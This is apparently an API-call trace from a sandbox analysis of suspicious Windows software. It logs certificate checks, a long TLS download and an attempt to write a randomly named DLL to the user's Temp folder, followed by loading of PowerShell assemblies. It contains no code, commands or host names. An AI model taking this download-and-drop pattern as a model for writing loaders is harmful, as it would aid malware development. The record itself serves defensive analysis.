	[0914.592] CertDuplicateCertificateChain (pChainContext=0x1ce14b70) returned 0x1ce14b70
	[0914.594] CertDuplicateCRLContext (pCrlContext=0x1b839a00) returned 0x1b839a00
	[0914.594] CertDuplicateCRLContext (pCrlContext=0x1ce67670) returned 0x1ce67670
	[0914.594] CertDuplicateCRLContext (pCrlContext=0x1ce676f0) returned 0x1ce676f0
	[0914.594] CertFreeCertificateChain (pChainContext=0x1ce14b70) 
	[0914.595] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x1ce14b70, pPolicyPara=0x1c73cf28, pPolicyStatus=0x1c73cf08 | out: pPolicyStatus=0x1c73cf08) returned 1
	[0914.596] SetLastError (dwErrCode=0x0) 
	[0914.601] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1ce14b70, pPolicyPara=0x1c73d000, pPolicyStatus=0x1c73cfe8 | out: pPolicyStatus=0x1c73cfe8) returned 1
	[0914.604] CertFreeCertificateChain (pChainContext=0x1ce14b70) 
	[0914.604] CertFreeCRLContext (pCrlContext=0x1b839a00) returned 1
	[0914.608] EncryptMessage (in: phContext=0x1c73d5b0, fQOP=0x0, pMessage=0x2fe4ba8, MessageSeqNo=0x0 | out: pMessage=0x2fe4ba8) returned 0x0
	[0914.608] send (s=0x4b0, buf=0x2fe48e8*, len=117, flags=0) returned 117
	[0915.077] setsockopt (s=0x4b0, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0
	[0915.078] recv (in: s=0x4b0, buf=0x2fe4d08, len=5, flags=0 | out: buf=0x2fe4d08*) returned 5
	[0915.078] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 6427
	[0915.078] recv (in: s=0x4b0, buf=0x2fe6648, len=9989, flags=0 | out: buf=0x2fe6648*) returned 6432
	[0916.051] recv (in: s=0x4b0, buf=0x2fe7f68, len=3557, flags=0 | out: buf=0x2fe7f68*) returned 3557
	[0916.483] DecryptMessage (in: phContext=0x1c73d170, pMessage=0x2fe8e60, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fe8e60, pfQOP=0x0) returned 0x0
	[0916.544] setsockopt (s=0x4b0, level=65535, optname=4102, optval="\xe0\x93\x04", optlen=4) returned 0
	[0916.580] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0916.580] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 190
	[0916.580] recv (in: s=0x4b0, buf=0x2fe4deb, len=16226, flags=0 | out: buf=0x2fe4deb*) returned 16226
	[0916.878] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300a470, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300a470, pfQOP=0x0) returned 0x0
	[0916.879] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0916.879] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 385
	[0916.879] recv (in: s=0x4b0, buf=0x2fe4eae, len=16031, flags=0 | out: buf=0x2fe4eae*) returned 16031
	[0917.651] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300a6b0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300a6b0, pfQOP=0x0) returned 0x0
	[0917.651] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0917.651] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 3260
	[0917.652] recv (in: s=0x4b0, buf=0x2fe59e9, len=13156, flags=0 | out: buf=0x2fe59e9*) returned 13156
	[0918.069] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300a8f0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300a8f0, pfQOP=0x0) returned 0x0
	[0918.070] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0918.070] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 775
	[0918.070] recv (in: s=0x4b0, buf=0x2fe5034, len=15641, flags=0 | out: buf=0x2fe5034*) returned 15641
	[0918.762] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300ab30, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300ab30, pfQOP=0x0) returned 0x0
	[0918.763] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0918.763] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 434
	[0918.763] recv (in: s=0x4b0, buf=0x2fe4edf, len=15982, flags=0 | out: buf=0x2fe4edf*) returned 15982
	[0919.610] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300adc0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300adc0, pfQOP=0x0) returned 0x0
	[0919.611] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0919.611] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 93
	[0919.611] recv (in: s=0x4b0, buf=0x2fe4d8a, len=16323, flags=0 | out: buf=0x2fe4d8a*) returned 16323
	[0920.107] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300b000, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300b000, pfQOP=0x0) returned 0x0
	[0920.108] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0920.108] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 4040
	[0920.108] recv (in: s=0x4b0, buf=0x2fe5cf5, len=12376, flags=0 | out: buf=0x2fe5cf5*) returned 12376
	[0920.371] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300b240, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300b240, pfQOP=0x0) returned 0x0
	[0920.371] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0920.372] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 2627
	[0920.372] recv (in: s=0x4b0, buf=0x2fe5770, len=13789, flags=0 | out: buf=0x2fe5770*) returned 13789
	[0920.913] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300b4a8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300b4a8, pfQOP=0x0) returned 0x0
	[0920.913] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0920.913] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 7646
	[0920.913] recv (in: s=0x4b0, buf=0x2fe6b0b, len=8770, flags=0 | out: buf=0x2fe6b0b*) returned 8770
	[0921.271] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300b6e8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300b6e8, pfQOP=0x0) returned 0x0
	[0921.272] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0921.272] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 1945
	[0921.272] recv (in: s=0x4b0, buf=0x2fe54c6, len=14471, flags=0 | out: buf=0x2fe54c6*) returned 14471
	[0921.919] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300b928, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300b928, pfQOP=0x0) returned 0x0
	[0921.920] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0921.920] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 4284
	[0921.920] recv (in: s=0x4b0, buf=0x2fe5de9, len=12132, flags=0 | out: buf=0x2fe5de9*) returned 12132
	[0922.190] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300bb90, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300bb90, pfQOP=0x0) returned 0x0
	[0922.191] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0922.191] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 1263
	[0922.191] recv (in: s=0x4b0, buf=0x2fe521c, len=15153, flags=0 | out: buf=0x2fe521c*) returned 15153
	[0922.601] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300bdd0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300bdd0, pfQOP=0x0) returned 0x0
	[0922.608] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0922.608] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 3066
	[0922.608] recv (in: s=0x4b0, buf=0x2fe5927, len=13350, flags=0 | out: buf=0x2fe5927*) returned 13350
	[0922.928] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300c038, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300c038, pfQOP=0x0) returned 0x0
	[0922.929] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0922.929] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 5405
	[0922.929] recv (in: s=0x4b0, buf=0x2fe624a, len=11011, flags=0 | out: buf=0x2fe624a*) returned 11011
	[0923.174] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300c2a0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300c2a0, pfQOP=0x0) returned 0x0
	[0923.175] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0923.176] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 1848
	[0923.176] recv (in: s=0x4b0, buf=0x2fe5465, len=14568, flags=0 | out: buf=0x2fe5465*) returned 14568
	[0923.355] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300c4e0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300c4e0, pfQOP=0x0) returned 0x0
	[0923.359] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0923.359] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 2043
	[0923.359] recv (in: s=0x4b0, buf=0x2fe5528, len=14373, flags=0 | out: buf=0x2fe5528*) returned 1072
	[0923.360] recv (in: s=0x4b0, buf=0x2fe5958, len=13301, flags=0 | out: buf=0x2fe5958*) returned 536
	[0923.360] recv (in: s=0x4b0, buf=0x2fe5b70, len=12765, flags=0 | out: buf=0x2fe5b70*) returned 12765
	[0923.533] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300c748, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300c748, pfQOP=0x0) returned 0x0
	[0923.534] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0923.535] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 94
	[0923.535] recv (in: s=0x4b0, buf=0x2fe4d8b, len=16322, flags=0 | out: buf=0x2fe4d8b*) returned 16322
	[0923.942] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300c988, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300c988, pfQOP=0x0) returned 0x0
	[0923.943] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0923.943] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 7257
	[0923.943] recv (in: s=0x4b0, buf=0x2fe6986, len=9159, flags=0 | out: buf=0x2fe6986*) returned 9159
	[0924.187] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300cbf0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300cbf0, pfQOP=0x0) returned 0x0
	[0924.187] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0924.187] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 8524
	[0924.187] recv (in: s=0x4b0, buf=0x2fe6e79, len=7892, flags=0 | out: buf=0x2fe6e79*) returned 7892
	[0924.232] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300ce30, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300ce30, pfQOP=0x0) returned 0x0
	[0924.233] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0924.233] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 679
	[0924.233] recv (in: s=0x4b0, buf=0x2fe4fd4, len=15737, flags=0 | out: buf=0x2fe4fd4*) returned 6968
	[0924.443] recv (in: s=0x4b0, buf=0x2fe6b0c, len=8769, flags=0 | out: buf=0x2fe6b0c*) returned 8769
	[0924.443] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300d098, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300d098, pfQOP=0x0) returned 0x0
	[0924.444] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0924.444] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 3554
	[0924.444] recv (in: s=0x4b0, buf=0x2fe5b0f, len=12862, flags=0 | out: buf=0x2fe5b0f*) returned 12862
	[0924.568] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300d2d8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300d2d8, pfQOP=0x0) returned 0x0
	[0924.569] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0924.569] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 533
	[0924.569] recv (in: s=0x4b0, buf=0x2fe4f42, len=15883, flags=0 | out: buf=0x2fe4f42*) returned 6432
	[0924.616] recv (in: s=0x4b0, buf=0x2fe6862, len=9451, flags=0 | out: buf=0x2fe6862*) returned 9451
	[0924.682] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300d540, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300d540, pfQOP=0x0) returned 0x0
	[0924.683] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0924.683] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 728
	[0924.683] recv (in: s=0x4b0, buf=0x2fe5005, len=15688, flags=0 | out: buf=0x2fe5005*) returned 15688
	[0924.833] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300d780, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300d780, pfQOP=0x0) returned 0x0
	[0924.834] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0924.834] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 387
	[0924.834] recv (in: s=0x4b0, buf=0x2fe4eb0, len=16029, flags=0 | out: buf=0x2fe4eb0*) returned 5896
	[0924.862] recv (in: s=0x4b0, buf=0x2fe65b8, len=10133, flags=0 | out: buf=0x2fe65b8*) returned 10133
	[0924.957] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300d9e8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300d9e8, pfQOP=0x0) returned 0x0
	[0924.958] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0924.958] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 2726
	[0924.958] recv (in: s=0x4b0, buf=0x2fe57d3, len=13690, flags=0 | out: buf=0x2fe57d3*) returned 13690
	[0925.248] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300dc28, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300dc28, pfQOP=0x0) returned 0x0
	[0925.249] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0925.249] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 4529
	[0925.249] recv (in: s=0x4b0, buf=0x2fe5ede, len=11887, flags=0 | out: buf=0x2fe5ede*) returned 11887
	[0925.425] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300de90, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300de90, pfQOP=0x0) returned 0x0
	[0925.427] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0925.427] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 6332
	[0925.427] recv (in: s=0x4b0, buf=0x2fe65e9, len=10084, flags=0 | out: buf=0x2fe65e9*) returned 10084
	[0925.514] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300e0d0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300e0d0, pfQOP=0x0) returned 0x0
	[0925.514] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0925.514] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 2775
	[0925.515] recv (in: s=0x4b0, buf=0x2fe5804, len=13641, flags=0 | out: buf=0x2fe5804*) returned 536
	[0925.515] recv (in: s=0x4b0, buf=0x2fe5a1c, len=13105, flags=0 | out: buf=0x2fe5a1c*) returned 536
	[0925.516] recv (in: s=0x4b0, buf=0x2fe5c34, len=12569, flags=0 | out: buf=0x2fe5c34*) returned 1072
	[0925.516] recv (in: s=0x4b0, buf=0x2fe6064, len=11497, flags=0 | out: buf=0x2fe6064*) returned 1072
	[0925.517] recv (in: s=0x4b0, buf=0x2fe6494, len=10425, flags=0 | out: buf=0x2fe6494*) returned 10425
	[0925.609] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300e310, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300e310, pfQOP=0x0) returned 0x0
	[0925.610] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0925.610] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 2434
	[0925.610] recv (in: s=0x4b0, buf=0x2fe56af, len=13982, flags=0 | out: buf=0x2fe56af*) returned 13982
	[0925.776] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300e578, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300e578, pfQOP=0x0) returned 0x0
	[0925.777] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0925.778] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 1557
	[0925.778] recv (in: s=0x4b0, buf=0x2fe5342, len=14859, flags=0 | out: buf=0x2fe5342*) returned 14859
	[0925.878] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300e7e0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300e7e0, pfQOP=0x0) returned 0x0
	[0925.879] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0925.879] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 2824
	[0925.879] recv (in: s=0x4b0, buf=0x2fe5835, len=13592, flags=0 | out: buf=0x2fe5835*) returned 13592
	[0925.964] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300ea20, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300ea20, pfQOP=0x0) returned 0x0
	[0925.965] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0925.965] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 339
	[0925.965] recv (in: s=0x4b0, buf=0x2fe4e80, len=16077, flags=0 | out: buf=0x2fe4e80*) returned 3216
	[0925.972] recv (in: s=0x4b0, buf=0x2fe5b10, len=12861, flags=0 | out: buf=0x2fe5b10*) returned 12861
	[0926.140] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300ec60, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300ec60, pfQOP=0x0) returned 0x0
	[0926.141] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0926.141] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 12862
	[0926.141] recv (in: s=0x4b0, buf=0x2fe7f6b, len=3554, flags=0 | out: buf=0x2fe7f6b*) returned 3554
	[0926.148] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300eea0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300eea0, pfQOP=0x0) returned 0x0
	[0926.149] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0926.149] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 729
	[0926.150] recv (in: s=0x4b0, buf=0x2fe5006, len=15687, flags=0 | out: buf=0x2fe5006*) returned 15687
	[0926.296] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300f108, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300f108, pfQOP=0x0) returned 0x0
	[0926.297] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0926.297] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 1460
	[0926.297] recv (in: s=0x4b0, buf=0x2fe52e1, len=14956, flags=0 | out: buf=0x2fe52e1*) returned 14956
	[0926.381] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300f348, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300f348, pfQOP=0x0) returned 0x0
	[0926.381] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0926.382] recv (in: s=0x4b0, buf=0x2fe4d2d, len=16416, flags=0 | out: buf=0x2fe4d2d*) returned 47
	[0926.382] recv (in: s=0x4b0, buf=0x2fe4d5c, len=16369, flags=0 | out: buf=0x2fe4d5c*) returned 2144
	[0926.386] recv (in: s=0x4b0, buf=0x2fe55bc, len=14225, flags=0 | out: buf=0x2fe55bc*) returned 1072
	[0926.386] recv (in: s=0x4b0, buf=0x2fe59ec, len=13153, flags=0 | out: buf=0x2fe59ec*) returned 13153
	[0926.473] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300f560, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300f560, pfQOP=0x0) returned 0x0
	[0926.474] recv (in: s=0x4b0, buf=0x2fe4d28, len=5, flags=0 | out: buf=0x2fe4d28*) returned 5
	[0926.474] recv (in: s=0x4b0, buf=0x2fe4d2d, len=4752, flags=0 | out: buf=0x2fe4d2d*) returned 1850
	[0926.474] recv (in: s=0x4b0, buf=0x2fe5467, len=2902, flags=0 | out: buf=0x2fe5467*) returned 2902
	[0926.498] DecryptMessage (in: phContext=0x1c73d740, pMessage=0x300f750, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x300f750, pfQOP=0x0) returned 0x0
	[0926.503] SetEvent (hEvent=0x358) returned 1
	[0927.580] VirtualQuery (in: lpAddress=0x1c73d310, lpBuffer=0x1c73e1d0, dwLength=0x30 | out: lpBuffer=0x1c73e1d0*(BaseAddress=0x1c73d000, AllocationBase=0x1bdb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0935.840] CoTaskMemAlloc (cb=0x104) returned 0x1b85e180
	[0935.840] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b85e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0935.840] CoTaskMemFree (pv=0x1b85e180) 
	[0935.841] CoTaskMemAlloc (cb=0x104) returned 0x1b85e180
	[0935.841] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x1b85e180, nSize=0x80 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24
	[0935.841] CoTaskMemFree (pv=0x1b85e180) 
	[0935.847] CoTaskMemAlloc (cb=0x104) returned 0x1b85e180
	[0935.847] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x1b85e180, nSize=0x80 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24
	[0935.847] CoTaskMemFree (pv=0x1b85e180) 
	[0939.393] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5P5NRG~1\\", lpszLongPath=0x1c73d410, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 0x1e
	[0939.393] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll", nBufferLength=0x105, lpBuffer=0x1c73d490, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll", lpFilePart=0x0) returned 0x3f
	[0939.393] SetErrorMode (uMode=0x1) returned 0x1
	[0939.393] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vthqexnegi.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffffffffffff
	[0953.667] SetErrorMode (uMode=0x1) returned 0x1
	[0953.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c73ada0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0953.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c73acf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0953.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c73acf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0953.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c73acf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.681] CoTaskMemAlloc (cb=0x104) returned 0x1b85e180
	[0954.681] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b85e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0954.681] CoTaskMemFree (pv=0x1b85e180) 

Thread:
	id = 2006
	os_tid = 0x2748


Thread:
	id = 2014
	os_tid = 0x2768


Thread:
	id = 2019
	os_tid = 0x277c

	[0905.008] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
